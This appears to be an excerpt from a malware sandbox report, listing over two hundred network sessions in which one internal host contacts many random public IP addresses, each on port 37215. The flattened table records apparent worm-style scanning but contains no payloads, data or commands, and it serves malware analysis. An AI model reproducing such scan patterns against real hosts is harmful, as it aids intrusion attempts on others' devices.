                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10407192.168.2.134868241.42.222.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10408192.168.2.134601241.234.253.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10409192.168.2.1342920157.120.42.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10410192.168.2.1351472197.54.120.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10411192.168.2.1342484157.21.243.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10412192.168.2.135509261.106.170.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10413192.168.2.1354246157.167.118.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10414192.168.2.134275841.76.58.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10415192.168.2.135198241.189.2.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10416192.168.2.133627841.170.103.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10417192.168.2.1334048197.104.93.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10418192.168.2.1347686197.125.7.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10419192.168.2.1342186157.82.131.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10420192.168.2.1358964197.100.57.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10421192.168.2.135035075.244.21.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10422192.168.2.1350220104.35.68.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10423192.168.2.135206661.84.8.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10424192.168.2.1337910197.39.207.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10425192.168.2.1336166197.201.227.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10426192.168.2.133503441.94.104.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10427192.168.2.135014641.43.161.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10428192.168.2.1341968157.17.205.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10429192.168.2.133403295.143.7.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10430192.168.2.1348258197.211.85.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10431192.168.2.1360978157.233.118.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10432192.168.2.135129465.132.53.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10433192.168.2.1350168157.178.0.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10434192.168.2.133524014.56.51.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10435192.168.2.135673041.84.41.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10436192.168.2.134023241.150.155.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10437192.168.2.134096812.213.51.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10438192.168.2.133598077.224.19.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10439192.168.2.135938241.226.164.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10440192.168.2.1350920157.107.103.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10441192.168.2.1334434157.132.228.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10442192.168.2.1353656157.248.115.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10443192.168.2.1337662157.81.172.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10444192.168.2.1351724197.37.218.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10445192.168.2.1343212197.226.125.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10446192.168.2.1342520157.100.1.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10447192.168.2.134695241.113.98.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10448192.168.2.1337174157.81.114.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10449192.168.2.1356260197.210.148.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10450192.168.2.135271641.109.158.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10451192.168.2.1348366197.4.44.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10452192.168.2.1347958197.113.60.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10453192.168.2.1356344157.162.170.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10454192.168.2.1346932178.109.72.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10455192.168.2.133294841.58.96.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10456192.168.2.1360698103.134.34.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10457192.168.2.1355366197.78.84.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10458192.168.2.1355748197.155.224.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10459192.168.2.1342682157.127.169.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10460192.168.2.135904841.90.6.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10461192.168.2.133733090.67.177.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10462192.168.2.1339838157.105.194.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10463192.168.2.135496814.104.178.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10464192.168.2.134466841.52.220.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10465192.168.2.1346184213.246.76.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10466192.168.2.1338830157.252.130.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10467192.168.2.135991878.14.16.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10468192.168.2.1358296219.142.101.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10469192.168.2.133730841.175.74.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10470192.168.2.1350080197.32.207.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10471192.168.2.1334178103.80.254.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10472192.168.2.1335010143.108.170.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10473192.168.2.1342294197.150.28.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10474192.168.2.134684292.112.125.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10475192.168.2.1339836197.32.63.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10476192.168.2.1349932197.60.92.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10477192.168.2.1335788197.103.174.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10478192.168.2.1344780150.184.40.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10479192.168.2.1341806197.212.235.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10480192.168.2.1352862197.197.204.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10481192.168.2.1360898157.23.93.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10482192.168.2.1350498157.9.52.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10483192.168.2.1339070203.70.26.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10484192.168.2.134544041.36.209.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10485192.168.2.1355952205.176.130.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10486192.168.2.1356012197.159.41.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10487192.168.2.133579241.61.214.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10488192.168.2.133869841.250.82.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10489192.168.2.1347050141.62.139.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10490192.168.2.1332948157.186.37.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10491192.168.2.133516241.87.81.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10492192.168.2.1333006162.94.20.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10493192.168.2.1338934197.252.191.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10494192.168.2.1345512157.45.215.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10495192.168.2.135836453.82.248.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10496192.168.2.1342726157.170.172.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10497192.168.2.1357804157.82.104.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10498192.168.2.1359396132.114.215.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10499192.168.2.1341826157.222.254.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10500192.168.2.1348620197.200.189.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10501192.168.2.1356476197.110.85.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10502192.168.2.135556641.93.116.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10503192.168.2.1340766197.102.103.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10504192.168.2.1342408166.15.205.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10505192.168.2.1358164197.74.197.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10506192.168.2.134247689.96.4.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10507192.168.2.134337441.244.247.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10508192.168.2.133557232.152.203.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10509192.168.2.1360278157.43.211.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10510192.168.2.1344710197.145.5.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10511192.168.2.1358224195.103.77.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10512192.168.2.1342700157.200.112.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10513192.168.2.1345130157.30.32.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10514192.168.2.135228841.108.30.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10515192.168.2.135718441.80.49.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10516192.168.2.134221241.224.234.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10517192.168.2.1349828197.2.2.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10518192.168.2.1336664196.93.204.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10519192.168.2.1340194157.188.236.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10520192.168.2.1339754195.169.185.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10521192.168.2.135328049.95.127.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10522192.168.2.134933869.39.77.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10523192.168.2.1360206197.148.39.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10524192.168.2.1347546157.234.110.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10525192.168.2.1333452197.115.103.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10526192.168.2.134488241.222.140.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10527192.168.2.1343166197.122.119.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10528192.168.2.1339300116.157.197.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10529192.168.2.1358096197.176.74.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10530192.168.2.1342168197.56.115.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10531192.168.2.133791841.221.44.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10532192.168.2.134247241.13.137.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10533192.168.2.135636841.72.6.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10534192.168.2.1336170177.136.82.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10535192.168.2.1356260197.27.109.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10536192.168.2.1347374197.225.177.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10537192.168.2.134875041.220.236.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10538192.168.2.1339164157.103.189.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10539192.168.2.133728041.8.35.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10540192.168.2.133540441.156.226.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10541192.168.2.1343364156.135.33.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10542192.168.2.1357632157.171.255.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10543192.168.2.1349700197.170.0.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10544192.168.2.1343802197.213.161.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10545192.168.2.1344950157.248.24.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10546192.168.2.1334172157.164.251.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10547192.168.2.1354144197.60.60.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10548192.168.2.136074041.58.131.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10549192.168.2.134378041.29.32.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10550192.168.2.1354024170.58.169.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10551192.168.2.1332946157.92.11.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10552192.168.2.1339498157.1.94.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10553192.168.2.135302641.212.188.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10554192.168.2.1349710167.8.251.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10555192.168.2.1354910110.75.29.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10556192.168.2.1360158197.119.106.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10557192.168.2.1342376157.146.19.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10558192.168.2.135197641.226.42.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10559192.168.2.133755641.68.140.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10560192.168.2.1345754197.30.60.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10561192.168.2.1344412180.181.252.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10562192.168.2.1358972157.100.149.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10563192.168.2.1348844197.27.34.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10564192.168.2.1359916208.202.243.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10565192.168.2.1356386177.196.120.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10566192.168.2.1344880197.76.131.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10567192.168.2.133883687.240.123.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10568192.168.2.1347816197.136.43.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10569192.168.2.1342114197.25.187.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10570192.168.2.1352854197.75.234.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10571192.168.2.1334696193.61.176.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10572192.168.2.1344014197.146.219.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10573192.168.2.1352184197.228.150.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10574192.168.2.1337118121.27.229.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10575192.168.2.136013841.210.17.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10576192.168.2.13592361.159.166.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10577192.168.2.134061236.187.139.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10578192.168.2.1346572197.228.119.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10579192.168.2.1336540157.166.124.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10580192.168.2.1336672157.117.93.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10581192.168.2.133734863.44.45.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10582192.168.2.133404284.56.249.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10583192.168.2.1346542197.125.121.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10584192.168.2.1349578157.112.16.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10585192.168.2.1340946197.155.125.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10586192.168.2.135147041.3.64.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10587192.168.2.134299841.106.7.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10588192.168.2.134521641.163.163.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10589192.168.2.1359784157.201.57.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10590192.168.2.1358984157.116.178.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10591192.168.2.1333822197.201.118.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10592192.168.2.134211441.0.21.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10593192.168.2.1340572157.2.75.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10594192.168.2.1360620197.48.52.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10595192.168.2.134933041.153.158.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10596192.168.2.1353490197.31.93.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10597192.168.2.1351020197.89.244.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10598192.168.2.133656218.49.56.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10599192.168.2.1333564160.161.234.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10600192.168.2.134377631.241.234.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10601192.168.2.1342272197.230.247.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10602192.168.2.134780641.249.70.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10603192.168.2.133903641.73.114.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10604192.168.2.133481841.254.113.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10605192.168.2.1353346157.191.239.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10606192.168.2.133890041.27.82.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10607192.168.2.1356414157.230.70.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10608192.168.2.1354142197.214.33.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10609192.168.2.134217641.46.69.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10610192.168.2.134454441.142.119.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10611192.168.2.1348108157.179.157.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10612192.168.2.1347090157.210.174.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10613192.168.2.136033017.86.33.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10614192.168.2.1360894197.2.23.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10615192.168.2.133364241.55.83.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
